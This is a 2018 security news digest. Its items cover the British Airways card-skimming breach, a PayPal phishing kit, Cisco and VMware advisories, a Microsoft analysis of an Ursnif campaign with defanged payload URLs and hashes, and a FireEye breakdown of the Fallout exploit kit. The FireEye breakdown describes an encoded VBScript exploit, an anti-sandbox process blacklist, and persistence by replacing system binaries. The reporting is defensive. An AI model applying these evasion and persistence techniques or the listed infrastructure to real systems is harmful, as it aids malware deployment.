Daily Archives: September 6, 2018

Beware of the New Way Crooks Can Drain Your Credit Card Account

This article describes one of the recent frauds used by cybercriminals to steal funds from people’s credit cards. Unfortunately, it is a simple one to pull off, so peruse the details below and make sure you don’t get on the hook. The malicious logic in a nutshell The malefactors use a legit remote access tool […]… Read More

The post Beware of the New Way Crooks Can Drain Your Credit Card Account appeared first on The State of Security.

NBlog Sept 7 – what have policies ever done for us?

Why do we have policies, procedures and all that jazz? What are they and what are they for?  What do they actually achieve?  What would happen if we didn't bother at all?  What else could we do instead - are there better ways?  

Those rhetorical questions were prompted by a disarmingly simple and naive-sounding question on the ISO27k Forum this morning, viz "I am looking at implementing iso27001. How do I know if I need a policy or procedure in place?" 

Good question!

In relation to ISO27k and to information risk and security in general, policies and/or procedures are needed in order to:
  • Address information risks that are of concern to the organization, or more specifically to management and other stakeholders;
  • State or express management's intentions formally in various areas;
  • Communicate and clarify things to the intended readers, giving them clear guidance (e.g. work instructions, awareness and training materials);
  • Satisfy requirements stated explicitly in ISO/IEC 27001(assuming the organization intends to be certified compliant);
  • Satisfy other relevant and applicable requirements (e.g. under privacy laws and regulations, or for contractual reasons);
  • Promote good practices through a stable, mature, considered, structured and systematic approach, allowing continuous review, updates and improvement where needed;
  • Integrate various approaches in a coherent manner (e.g.information risk and security, plus privacy, plus business continuity, plus compliance, plus physical security, plus .... plus ...);
  • Demonstrate to all concerned (insiders and outsiders) that various issues have been considered and desired approaches have been determined, while generally implying that other possible approaches have been discounted and are not required, perhaps even not approved or authorized;
  • Enable assurance checks and formal compliance enforcement purposes, in which case they need to be unambiguous: clearly written, clearly applicable, clearly mandated ...;
  • Ensure consistency of operations and response; *
  • Allow for reporting and metrication of results; *
  • Stop people guessing or making stuff up on a whim, or at least reduce this in certain areas while giving them more latitude in other areas;
  • Emphasize and focus attention on Stuff That Matters.
* Additional objectives contributed by Anton Aylward - thanks Anton!

As to 'policy' and 'procedure', individuals and organizations quite often interpret those and related terms differently. Dictionary definitions are generally   definitive.

ISO/IEC 27000 defines some terms explicitly in the context of the ISO27k standards including:
  • “Documented information” means information required to be controlled and maintained by an organization and the medium on which it is contained [i.e. ‘documentation’ in common parlance];
  • “Policy” means intentions and direction of an organization, as formally expressed by its top management [where organization and top management are also explicitly-defined terms];
  • “Process” means set of interrelated or interacting activities which transforms inputs into outputs [where none of those terms are explicitly defined!].
By the way, "insurance policy" neatly demonstrates a key difficulty in defining words individually, in isolation from the context. An insurance policy is not the "intentions and direction of an organization, as formally expressed by its top management" - it is a legally binding agreement, a contract between the parties concerning the insurance arrangement. "Foreign policy" is different again, and so on. Dictionaries tackle this situation by providing multiple, distinct or related definitions and examples, illustrating the defined terms being used in typical statements. ISO/IEC 27000 backs into a corner by giving just one definition and no context.

To make it worse, several key words and terms (including "key", for one!), are undefined. “Procedure” is not explicitly defined … but is used throughout ISO27k including 27000 itself where “processes and procedures” suggests they are distinct, and “policies, procedures and practices” implies further [also undefined] distinctions.

“Procedure” to me means the description of a “process” which is generally a sequence of “activities” which may be “tasks” or “decisions” or something else (e.g. “Wait patiently for authorization”). The manner of their description may be step-by-step instructions, flow diagrams, demonstrations, notes or some other format, usually captured in some form so that it can be more easily and consistently specified, stored, standardized, reviewed and authorized, communicated/used, and improved.
I have my own personal documentation preferences and styles. Given the choice, I prefer clear at-a-glance diagrams over tedious paragraphs of text for procedures, although both and more may be needed. For corporate policies, I much prefer readable plain English over the curious pseudo-legal mumbo-jumbo that is depressingly common in practice. But then IANAL: I'm a technical author writing information risk and security policies, procedures, training guides and awareness materials for ordinary people.

If a client uses different terms or interpretations, has particular requirements such as specific documentation formats and styles, needs their mumbo to be jumbo or whatever, that’s fine by me. He who pays the piper calls the tune!  

British Airways Customer Data Stolen in Website and Mobile App Hack

In a statement, British Airways stated: "From 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive, the personal and financial details of customers making bookings on ba.com and the airline’s app were compromised." The airline said they will be notifying affected customers, and if anyone has been impacted to contact their bank or credit card providers.
The Telegraph reported 380,0000 payments were compromised, and that BA customers had experienced payment card fraud as a result before the BA breach disclosure, which strongly suggests unencrypted debit\credit cards were stolen.

There are no details about the data theft method at the moment, but given the statement said the BA website and BA mobile app was compromised, I think we could be looking at another example of an insecure API being exploited, as per the Air Canada breach and the T-Mobile breach last month.

We'll see what comes out in the wash over the next few days and weeks, but thanks to the GDPR, at least UK firms are quickly notifying their customers when their personal and financial data has been compromised, even if there is little detail reported about how. Without knowing how the data was compromised, customers cannot be truly assured their private data is safe. It also will be interesting to learn whether the BA systems were compliant with the Payment Card Industry Data Security Standard (PCI DSS), required by all organisations that accept, process, store and/or transmit debit and credit cards.

Update: 
A spokesperson at BA said "hackers carried out a sophisticated, malicious criminal attack on its website" and impacted BA customers would be compensated. 

380,000 card payment transactions were confirmed as stolen, specifically:
  • Full Name
  • Email address
  • Payment card number (PAN)
  • Expiration date
  • Card Security Code [CVV] - typically a 3 digit authorisation code written on the back of the debit\credit card
BA insists it did not store the CVV numbers, these are not allowed to be stored after payment card authorisation under PCI DSS. This suggests the card details may have been intercepted during the payment transaction, perhaps by a maliciously injected or compromised third party website plugin, as opposed to data theft from the database, as often seen with SQL injections attacks against web apps.

BA have published help and FAQs to anyone that is impacted by this data breach.
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information

British Airways is owned by IAG, their share price dropped by more than 4%, which equates to a £500m+ value loss in the company.

Update on the Attack Method (11 Sept 2018)
In a blog post RiskIQ researchers have claimed to have found evidence that a web-based card skimmer script was injected into the BA website, very similar to the approach used by the Magecard group, who are believed to be behind a similar attack against the Ticketmaster website recently. Web-based card skimmer script attacks have been occurring since 2015.

In this case, once the customer entered their payment card details and submitted the payment either on a PC or on a touchscreen device, the malicious script captured their data and sent it to a virtual (VPS) server hosted in Romania. The server was hosted on a domain called baways.com and was certified (https) by Comodo to make it look legit. The server domain was registered 6 days before the breach started, this obviously went undetected by BA's security, perhaps the rogue domain registration could have been picked up by a threat intelligence service.

Researchers have also claimed the BA website wasn't PCI DSS. They found 7 scripts running on the BA website, but crucially said the BA payment page wasn't isolating the card payments within an iframe, which would prevent third-party scripts (and XSS attacks) from being able to read the payment card form fields.

Bill Conner, CEO SonicWall said "Organizations and government entities carry a responsibility to consumers and civilians alike to guard their most valuable information at all cost. While the British Airways breach may not have been as detrimental as I’m sure its culprits would have liked it to be, it should serve as a wake-up call to CTOs, CIOs and CISOs. The fact is, it is early days, and the true damage done is yet to be seen. Personal information that does not change as easily as a credit card or bank account number drive a high price on the Dark Web. This kind of Personally Identifiable Information is highly sought after by cybercriminals for monetary gain. Companies should be implementing security best practices such as a layered approach to protection, as well as proactively updating any out of date security devices, as a matter of course."

Opinion: The Corporate Lessons of Election Hacks

Recent demonstrations of election hacks are about more than ballots. They also contain important lessons for enterprises,  Security Ledger Editor in Chief Paul Roberts argues in this opinion piece. (Note: this post first appeared on Hitachi Systems Security* web site.) Did an 11 year old hack a state election website? Are voting machines easy...

Read the whole entry... »

Related Stories

VMware Releases Security Updates

Original release date: September 06, 2018

VMware has released security updates to address vulnerabilities in VMware AirWatch Agent and Content Locker. An attacker could exploit these vulnerabilities to obtain access to sensitive information.

NCCIC encourages users and administrators to review the VMware Security Advisory VMSA-2018-0023 and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.


Inside the Phish: How a Phishing Campaign Really Works

Even with all of the hacks and third party breaches that have plagued some of the biggest global corporations over the past few years, phishing still remains one of the most frequent ways into an organization. It has been reported that up to 93% of all breaches start with a phish.

LookingGlass has broad and deep access to phishing data and insight into phishing campaign techniques for catching phish. We hope that in sharing the “behind-the-scenes” of a phishing attack, your organization can be more prepared to defend against this recurring digital risk.

Year-to-date we have observed the following as some of the top phishing “targets” or brands used as bait:

  • Wells Fargo
  • Microsoft
  • PayPal
  • Dropbox
  • Google

None of these should come as a surprise, as they are all well-known brands with expansive customer bases, and attackers typically cast a wide net in an effort to reach as many victims as possible. For example, if an attacker wants to infiltrate a corporate environment they can make a fairly educated guess that the likelihood of that business using a service such as Microsoft 365 is quite high. Thanks to widely available dumps of email addresses and account information, the attacker just needs to collect a list of email addresses associated with the business, craft their strategically themed phishing email, and then wait for the clicks to commence – and they will most certainly commence.

A common theme we have observed in association with these targets are login pages designed to harvest user credentials. In August, we took a look at a phishing campaign that targeted PayPal. In this instance, the phishing link was hosted on a WordPress site of an apparent victim domain, where the domain owner most likely had no idea that they were serving up malicious content on their site. A visit to the site’s home page revealed a very unobtrusive comment indicating that the site had been “Hacked by Virus-ma” (figure 1):

Virus Ma

 

Some quick research revealed Virus-ma had at least one hacking-related YouTube video channel.

When a user visits the phishing page via the phishing link, they are presented with an extremely realistic PayPal spoof (figure 2):

PayPal Login Page

Regardless of what credentials the user enters (we obviously did not use legit PayPal credentials in our testing), they will be accepted and the user is directed to the next screen which requests contact information. The screen following that asks for credit card information, social security number, and account number (figure 3):

Update Your Credit/Debit Card

The credit card data is checked in real time, so incorrect or false entries are instantly rejected. Our research did not go beyond this screen as we were not willing to provide legitimate user financial information that could be verified. Also, it is noteworthy that the website is encrypted, which gives a false sense of security to the user, ultimately making them more likely to provide confidential and sensitive information. In this case, the domain used a TLS certificate signed by cPanel (figure 4):

Certificate

The page source behind these pages revealed some interesting data about the attacker, in which they identify themselves and out the page as being a “scam page” (figure 5):

Phishing Log

At LookingGlass Cyber we see hundreds of phishing attacks like these every day. Trying to prevent them is a daunting task, but with an understanding of the processes behind the phish, organizations can better educate their users about what to avoid as well as put appropriate detection methods in place.

Protect yourself from future phishing attacks here, or contact us.

 

The post Inside the Phish: How a Phishing Campaign Really Works appeared first on LookingGlass Cyber Solutions Inc..

British Airways website hack exposed customer financial data

While we've gotten used to regular data breaches, it's been awhile since news of one hit the airline industry. But customers who booked flights on British Airways' website or app between 22:58 BST on August 21st and 21:45 BST on September 5th had their personal and financial data compromised due to a cybersecurity breach. The company's post announcing the event unwaveringly stated that anyone who made a booking in that time frame had their information stolen.

Via: BNO News

IDG Contributor Network: Why data loss prevention is a throwback technology

Black Hat 2018 may be behind us, but the trends, conversations and news coming out of the show are still top of mind. The conference was buzzing with cutting-edge topics, from election hacking to “whack-a-mole” security (as dubbed by Parisa Tabriz, director of engineering at Google).

For me, Black Hat is a time to connect with customers, prospects, partners, colleagues and friends to discuss the latest in insider threat management. Typically, during conference season, I come away with a few key takeaways (and free swag) that inform decisions I make for the strategy and management of the organization I run. This year proved to be no different.

Self-driving cars, election hacking and more

Black Hat is one of the top conferences for security professionals to learn about the latest technologies and vulnerabilities to be aware of in the coming year. From the surprising safety of self-driving cars, to new ways to hack into what many thought were secure systems, Black Hat is the spot for the latest innovations, hacking methods and more.

To read this article in full, please click here

Cisco Network Services Orchestrator Network Plug and Play Information Disclosure Vulnerability

A vulnerability in the Cisco Network Plug and Play server component of Cisco Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to gain unauthorized access to configuration data that is stored on an affected NSO system.

The vulnerability exists because the Network Plug and Play component performs incomplete validation when configured to use secure unique device identifiers (SUDI) for authentication. An attacker who controls a Cisco device that supports SUDI authentication and has connectivity to an affected NSO system could exploit this vulnerability. The attacker would need to leverage information about the devices that are being registered on the NSO server to send crafted Cisco Network Plug and Play authentication packets to an affected system. A successful exploit could allow the attacker to gain unauthorized access to configuration data for devices that will be managed by the NSO system.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-nso-infodis


Security Impact Rating: Medium
CVE: CVE-2018-0463

Small businesses targeted by highly localized Ursnif campaign

Cyber thieves are continuously looking for new ways to get people to click on a bad link, open a malicious file, or install a poisoned update in order to steal valuable data. In the past, they cast as wide a net as possible to increase the pool of potential victims. But attacks that create a lot of noise are often easier to spot and stop. Cyber thieves are catching on that we are watching them, so they are trying something different. Now were seeing a growing trend of small-scale, localized attacks that use specially crafted social engineering to stay under the radar and compromise more victims.

In social engineering attacks, is less really more?

A new malware campaign puts that to the test by targeting home users and small businesses in specific US cities. This was a focused, highly localized attack that aimed to steal sensitive info from just under 200 targets. Macro-laced documents masqueraded as statements from legitimate businesses. The documents are then distributed via email to target victims in cities where the businesses are located.

With Windows Defender AVs next gen defense, however, the size of the attack doesnt really matter.

Several cloud-based machine learning algorithms detected and blocked the malicious documents at the onset, stopping the attack and protecting customers from what would have been the payload, info-stealing malware Ursnif.

The map below shows the location of the targets.

Figure 1. Geographic distribution of target victims

Highly localized social engineering attack

Heres how the attack played out: Malicious, macro-enabled documents were delivered as email attachments to target small businesses and users. Each document had a file name that spoofed a legitimate business name and masqueraded as a statement from that business. In total, we saw 21 unique document file names used in this campaign.

The attackers sent these emails to intended victims in the city or general geographic area where the businesses are located. For example, the attachment named Dolan_Care_Statement.doc was sent almost exclusively to targets in Missouri. The document file name spoofs a known establishment in St. Louis. While we do not believe the establishment itself was affected or targeted by this attack, the document purports to be from the said establishment when its really not.

The intended effect is for recipients to get documents from local, very familiar business or service providers. Its part of the social engineering scheme to increase likelihood that recipients will think the document is legitimate and take the bait, when in reality it is a malicious document.

Most common lure document file names Top target cities
Dockery_FloorCovering_Statement Johnson City, TN
Kingsport, TN
Knoxville, TN
Dolan_Care_Statement St. Louis, MO
Chesterfield, MO
Lees Summit, MO
DMS_Statement Omaha, NE
Wynot, NE
Norwalk, OH
Dmo_Statement New Braunfels, TX
Seguin, TX
San Antonio, TX
DJACC_Statement Miami, FL
Flagler Beach, FL
Niles, MI
Donovan_Construction_Statement Alexandria, VA
Mclean, VA
Manassas, VA

Table 1. Top target cities of most common document file names

When recipients open the document, they are shown a message that tricks the person into enabling the macro.

Figure 2. Document tricks victim into enabling the macro

As is typical in social engineering attacks, this is not true. If the recipient does enable the macro, no content is shown. Instead the following process is launched to deobfuscate a PowerShell command.

Figure 3. Process to deobfuscate PowerShell

Figure 4. PowerShell command

The PowerShell script connects to any of 12 different URLs that all deliver the payload.

Figure 5. Deobfuscated PowerShell command

The payload is Ursnif, info-stealing malware. When run, Ursnif steals information about infected devices, as well as sensitive information like passwords. Notably, this infection sequence (i.e., cmd.exe process deobfuscates a PowerShell that in turn downloads the payload) is a common method used by other info-stealing malware like Emotet and Trickbot.

How machine learning stopped this small-scale, localized attack

As the malware campaign got under way, four different cloud-based machine learning models gave the verdict that the documents were malicious. These four models are among a diverse set of models that help ensure we catch a wide range of new and emerging threats. Different models have different areas of expertise; they use different algorithms and are trained on their unique set of features.

One of the models that gave the malicious verdict is a generic model designed to detect non-portable executable (PE) threats. We have found that models like this are effective in catching social engineering attacks, which typically use non-PE files like scripts and, as is the case for this campaign, macro-laced documents.

The said non-PE model is a simple averaged perceptron algorithm that uses various features, including expert features, fuzzy hashes of various file sections, and contextual data. The simplicity of the model makes it fast, enabling it to give split-second verdicts before suspicious files could execute. Our analysis into this specific model showed that the expert features and fuzzy hashes had the biggest impact in the models verdict and the eventual blocking of the attack.

Figure 6. Impact of features used by one ML model that detected the attack

Next-generation protection against malware campaigns regardless of size

Machine learning and artificial intelligence power Windows Defender Antivirus to detect and stop new and emerging attacks before they can wreak havoc. Every day, we protect customers from millions of distinct, first-seen malware. Our layered approach to intelligent, cloud-based protection employs a diverse set of machine learning models designed to catch the wide range of threats: from massive malware campaigns to small-scale, localized attacks.

The latter is a growing trend, and we continue to watch the threat landscape to keep machine learning effective against attacks. In a recent blog post, we discussed how we continue to harden machine learning defenses.

Windows Defender AV delivers the next-gen protection capabilities in the Windows Defender Advanced Threat Protection (Windows Defender ATP). Windows Defender ATP integrates attack surface reduction, next-gen protection, endpoint detection and response (EDR), automatic investigation and response, security posture, and advanced hunting capabilities. .

Because of this integration, antivirus detections, such as those related to this campaign, are surfaced in Windows Defender Security Center. Using EDR capabilities, security operations teams can then investigate and respond to the incident. Attack surface reduction rules also block this campaign, and these detections are likewise surfaced in Windows Defender ATP.To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Across the whole Microsoft 365 threat protection, detections and other security signals are shared among Office 365 ATP, Windows Defender ATP, and Azure ATP. In this Ursnif campaign, the antivirus detection also enables the blocking of related emails in Office 365. This demonstrates how signal sharing and orchestration of remediation across solutions in Microsoft 365 results in better integrated threat protection.

 

 

Bhavna Soman
Windows Defender Research

 

Indicators of compromise (IOCs)

Infector:

Hashes
407a6c99581f428634f9d3b9ec4b79f79c29c79fdea5ea5e97ab3d280b2481a1
77bee1e5c383733efe9d79173ac1de83e8accabe0f2c2408ed3ffa561d46ffd7
e9426252473c88d6a6c5031fef610a803bce3090b868d9a29a38ce6fa5a4800a
f8de4ebcfb8aa7c7b84841efd9a5bcd0935c8c3ee8acf910b3f096a5e8039b1f

File names
CSC_Statement.doc
DBC_Statement.doc
DDG_Statement.doc
DJACC_Statement.doc
DKDS_Statement.doc
DMII_Statement.doc
dmo_statement.doc
DMS_Statement.doc
Dockery_Floorcovering_Statement.doc
Docktail_Bar_Statement.doc
doe_statement.doc
Dolan_Care_Statement.doc
Donovan_Construction_Statement.doc
Donovan_Engineering_Statement.doc
DSD_Statement.doc
dsh_statement.doc
realty_group_statement.doc
statement.doc
tri-lakes_motors_statement.doc
TSC_Statement.doc
UCP_Statement.doc

Payload (Ursnif)

Hashes
31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f
bd23a2eec4f94c07f4083455f022e4d58de0c2863fa6fa19d8f65bfe16fa19aa
75f31c9015e0f03f24808dca12dd90f4dfbbbd7e0a5626971c4056a07ea1b2b9
070d70d39f310d7b8842f645d3ba2d44b2f6a3d7347a95b3a47d34c8e955885d
15743d098267ce48e934ed0910bc299292754d02432ea775957c631170778d71

URLs
hxxp://vezopilan[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://cimoselin[.]com/tst/index[.]php?l=soho2[.]tkn
hxxp://cimoselin[.]com/tst/index[.]php?l=soho4[.]tkn
hxxp://vedoriska[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://baberonto[.]com/tst/index[.]php?l=soho3[.]tkn

hxxp://hertifical[.]com/tst/index[.]php?l=soho8[.]tkn
hxxp://hertifical[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://condizer[.]com/tst/index[.]php?l=soho1[.]tkn
hxxp://vezeronu[.]com/tst/index[.]php?l=soho2[.]tkn
hxxp://vezeronu[.]com/tst/index[.]php?l=soho5[.]tkn

hxxp://zedrevo[.]com/tst/index[.]php?l=soho8[.]tkn
hxxp://zedrevo[.]com/tst/index[.]php?l=soho10[.]tkn

*Note: The first four domains above are all registered in Russia and are hosted on the IP address 185[.]212[.]44[.]114. The other domains follow the same URL pattern and are also pushing Ursnif, but no registration info is available.

 

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Small businesses targeted by highly localized Ursnif campaign appeared first on Microsoft Secure.

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

This is the fourth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS can help anyone going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires). In the previous articles we have written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.

Continue reading PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program at Sucuri Blog.

US charges North Korean man linked to Sony hack and WannaCry

The US Treasury Department announced today that it has sanctioned one individual and one group connected to malicious cyber activities perpetuated by North Korea's government. Park Jin Hyok, a computer programmer, was sanctioned today along with Korea Expo Joint Venture, an agency he allegedly worked for. The Treasury Department claims Hyok is part of a conspiracy responsible for the 2014 Sony Pictures hack, the 2016 Bangladesh Bank heist and last year's WannaCry ransomware attack. The Department of Justice also confirmed to reporters that it has charged Hyok with extortion, wire fraud and hacking crimes, according to Motherboard.

Source: US Treasury Department

EU Begins Formal Approval for Japan Adequacy Decision

On September 5, 2018, the European Commission (the “Commission”) announced in a press release the launch of the procedure to formally adopt the Commission’s adequacy decision with respect to Japan.

The press release notes that the EU-Japan talks on personal data protection were completed in July 2018, and announces the publication of the draft adequacy decision and related documents which, among other things, set forth the additional safeguards Japan will accord EU personal data that is transferred to Japan. According to the release, Japan is undertaking a similar formal adoption process concerning the reciprocal adequacy findings between the EU and Japan.

The adequacy decision intends to ensure that Japan provides privacy protections for EU personal data that are “essentially equivalent” to the EU standard. The key elements of the agreement include:

  • Specific safeguards to be applied by Japan to bridge the difference between EU and Japanese standards on issues such as sensitive data, onward transfer of EU data to third countries, and the right to access and rectification.
  • Enforcement by the Japan Personal Information Protection Commission.
  • Safeguards concerning access to EU personal data by Japanese public authorities for law enforcement and national security purposes.
  • A complaint-handling mechanism.

The press release also notes that the adequacy decision will complement the EU-Japan Economic Partnership Agreement by supporting free data flows between the EU and Japan and providing for privileged access to 127 million Japanese consumers.

Finally, the press release also outlines the next four steps in the formal approval process:

  • Opinion from the European Data Protection Board.
  • Consultation of a committee composed of representatives from the EU Member States (comitology procedure).
  • Update of the European Parliament Committee on Civil Liberties, Justice and Home Affairs.
  • Adoption of the adequacy decision by the College of Commissioners.

How to Protect Against Human Vulnerabilities in Your Security Program

When it comes to cybersecurity, no doubt humans are the weakest link. No matter how many layers are added to your security stack, nor how much phishing education and awareness training you do, threat actors continue to develop more sophisticated ways to exploit the human vulnerabilities with socially engineered attacks. In fact, as security defenses keep improving, hackers are compelled to develop more clever and convincing ways to exploit the human attack surface to gain access to sensitive assets.

Your face to soon become your boarding pass at Bengaluru airport

At the Bengaluru airport, soon will not have to carry your boarding pass and your face will be your boarding pass. Bengaluru airport will debut facial recognition in air travel in India. The first implementation milestone of the paperless biometric self-boarding technology at the airport will be completed in the first quarter of 2019.

The move is aimed at transforming the passenger experience and creating a future-ready airport.

Aviation in India is on a big upswing in terms of passenger demand. Now, the focus is on to make the entire process of providing access to the plane as easy as possible. Bengaluru International Airport (BIAL) has partnered with Portuguese technology company Vision-Box to implement this smart project, the airport authority said in a tweet.

The deal was signed on Wednesday in Lisbon, Portugal in the presence of Portuguese Prime Minister Antonio Costa.

"Your face is your boarding pass," said BIAL's MD & CEO Hari Marar, describing the revolutionary technology that is set to transform air travel. “Vision-Box’s state-of-the art biometric technology, combined with its passenger flow platform will enable a seamless journey for our passengers, without obstacles, waiting for lines or hassles, from registration to boarding,” Marar added.

Vision-Box CEO Miguel Leitmann said that this will be the first end-to-end face recognition-based walkthrough experience in Asia. "We’re very proud to team up with Kempegowda International Airport, Bengaluru. We’re together raising the flag of a historical milestone, marking not only the significant improvement of the experience of those who travel through Bangalore but also the accomplishment of a seamless digital airport journey. This is the first end-to-end face recognition-based walkthrough experience in Asia and the largest in the world,” said Leitmann.

Vision-Box provided Automated Border Control and electronic identity solutions that use ICAO-compliant standards. Biometric technology will identify the passengers by their face as they move across the airport, avoiding stops and the repeated presentation of boarding passes, passports or other physical identity documents, the statement said.

Airlines like Air Asia, SpiceJet and Jet Airways may be among the early users of the technology.

Three Best Practices to Secure Critical Infrastructure

In the last few years, executives overseeing energy, utility and other industrial organizations have begun to worry about the threat of cyberattacks on our nation’s most critical infrastructures. Ten years ago, their main concerns were focused on safety or environmental risks. Back then, operators believed the virtual barricades, or air gaps, between networks and technologies were sufficient enough to defend against malware and cyberattacks.

DOJ will reportedly charge North Korean operative for Sony hack

The Justice Department will reportedly announce charges today against at least one North Korean operative connected to the 2014 cyberattack on Sony Pictures, the Washington Post reports. Officials told the publication that computer hacking charges would be brought against Park Jin Hyok, who is said to have worked with North Korea's military intelligence agency the Reconnaissance General Bureau. It's the first time these types of charges have been brought against an operative of North Korea.

Source: Washington Post

IDG Contributor Network: It’s time to get off the treadmill: Why you should understand adversary playbooks

When deploying prevention and detection controls, most network defenders are on a treadmill of sifting through thousands of indicators of compromise, trying to prioritize which ones they should tackle first. Typically, they know nothing about the context of the indicator, just that it is bad, and that it should be blocked somewhere in the environment. The problem is they never sift through them all, which makes them feel like they are always behind – which they are.

What the Cyber Threat Alliance and Unit 42, Palo Alto Networks threat intelligence team, have been advocating for the past five years is to flip the equation and embrace adversary playbooks.

To read this article in full, please click here

Three Ways to Justify the IT Security Budget You Need

Advocating for the return on investment (ROI) in IT security has traditionally been a challenge for IT professionals to communicate to management. IT teams are responsible for the complicated task of balancing budget limitations with strong protection that will reduce the risk of a cyberattack in today’s dynamic threat landscape. However, according to a recent Kaspersky Lab report, businesses are starting to invest more in IT security rather than treat it as a cost center.

Fallout Exploit Kit Used in Malvertising Campaign to Deliver GandCrab Ransomware

Towards the end of August 2018, FireEye identified a new exploit kit (EK) that was being served up as part of a malvertising campaign affecting users in Japan, Korea, the Middle East, Southern Europe, and other countries in the Asia Pacific region.

The first instance of the campaign was observed on Aug. 24, 2018, on the domain finalcountdown[.]gq. Tokyo-based researchers “nao_sec” identified an instance of this campaign on Aug. 29, and in their own blog post they refer to the exploit kit as Fallout Exploit Kit. As part of our research, we observed additional domains, regions, and payloads associated with the campaign. Other than SmokeLoader being distributed in Japan, which is mentioned in the nao_sec blog post, we observed GandCrab ransomware being distributed in the Middle East, which we will be focusing on in this blog post.

Fallout EK fingerprints the user browser profile and delivers malicious content if the user profile matches a target of interest. If successfully matched, the user is redirected from a genuine advertiser page, via multiple 302 redirects, to the exploit kit landing page URL. The complete chain from legit domain, cushion domains, and then to the exploit kit landing page is shown in Figure 1.


Figure 1: Malvertisement redirection to Fallout Exploit Kit landing page

The main ad page prefetches cushion domain links while loading the ad and uses the <noscript> tag to load separate links in cases where JavaScript is disabled in a browser (Figure 2).


Figure 2: Content in the first ad page

In regions not mentioned earlier in this blog post, the ‘link rel="dns-prefetch" href”’ tag has a different value and the ad does not lead to the exploit kit. The complete chain of redirection via 302 hops is shown in Figure 3, 4 and 5


Figure 3: 302 redirect to exploit kit controlled cushion servers


Figure 4: Another redirection before exploit kit landing page


Figure 5: Last redirect before user reaches exploit kit landing page

URIs for the landing page keep changing and are too generic for a pattern, making it harder for IDS solutions that rely on detections based on particular patterns.

Depending on browser/OS profiles and the location of the user, the malvertisement either delivers the exploit kit or tries to reroute the user to other social engineering campaigns. For example, in the U.S. on a fully patched macOS system, malvertising redirects users to social engineering attempts similar to those shown in Figure 6 and Figure 7.


Figure 6: Fake AV prompt for Mac users


Figure 7: Fake Flash download prompt

The strategy is consistent with the rise of social engineering attempts FireEye has been observing for some time, where bad actors use them to target users that are on fully patched systems or any OS/software profile that is not ideal for any exploit attempts due to software vulnerability. The malvertisement redirect involved in the campaign has been abused heavily in many social engineering campaigns in North America as well.

FireEye Dynamic Threat Intelligence (DTI) shows that this campaign has triggered alerts from customers in the government, telecom and healthcare sectors.

Landing Page

Initially, the landing page only contained code for a VBScript vulnerability (CVE-2018-8174). However, Flash embedding code was later added for more reliable execution of the payload.

The landing page keeps the VBScript code as Base64 encoded text in the ‘<span>’ tag. It loads a JScript function when the page loads, which decodes the next stage VBScript code and executes it using the VBScript ExecuteGlobal function (Figure 8).


Figure 8: Snippet of landing page

Figure 9 shows the JScript function that decodes the malicious VBScript code.


Figure 9: Base64 decode function

Flash embedding code is inside the ‘noscript’ tag and loads only when scripts are disabled (Figure 10).


Figure 10: Flash embedding code

The decoded VBScript code exploits the CVE-2018-8174 vulnerability and executes shellcode (Figure 11).


Figure 11: Decoded VBScript

 The shellcode downloads a XOR’d payload at %temp% location, decrypts it, and executes it (Figure 12).


Figure 12: XOR binary transfer that decrypts to 4072690b935cdbfd5c457f26f028a49c

Payload Analysis (4072690b935cdbfd5c457f26f028a49c)

The malware contains PE loader code that is used for initial loading and final payload execution (Figure 13).


Figure 13: Imports resolver from the PE loader

The unpacked DLL 83439fb10d4f9e18ea7d1ebb4009bdf7 starts by initializing a structure of function pointers to the malware's core functionality (Figure 14).


Figure 14: Core structure populated with function pointers

It then enumerates all running processes, creates their crc32 checksums, and tries to match them against a list of blacklisted checksums. The list of checksums and their corresponding process names are listed in Table 1.

CRC32 Checksum

Process Name

99DD4432h

vmwareuser.exe

2D859DB4h

vmwareservice.exe

64340DCEh

vboxservice.exe

63C54474h

vboxtray.exe

349C9C8Bh

Sandboxiedcomlaunch.exe

5BA9B1FEh

procmon.exe

3CE2BEF3h

regmon.exe

3D46F02Bh

filemon.exe

77AE10F7h

wireshark.exe

0F344E95Dh

netmon.exe

278CDF58h

vmtoolsd.exe

Table 1: Blacklisted checksums

If any process checksums match, the malware goes into an infinite loop, effectively becoming benign from this point onward (Figure 15).


Figure 15: Blacklisted CRC32 check

If this check passes, a new thread is started in which the malware first acquires "SeShutdownPrivilege" and checks its own image path, OS version, and architecture (x86/x64). For OS version 6.3 (Windows 8.1/Windows Server 2012), the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\ctfmon.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\ctfmon.exe" with a copy of itself
  • Check whether "ctfmon.exe" is already running. If not, add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In other OS versions, the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\rundll32.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\rundll32.exe" with a copy of itself
  • Add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

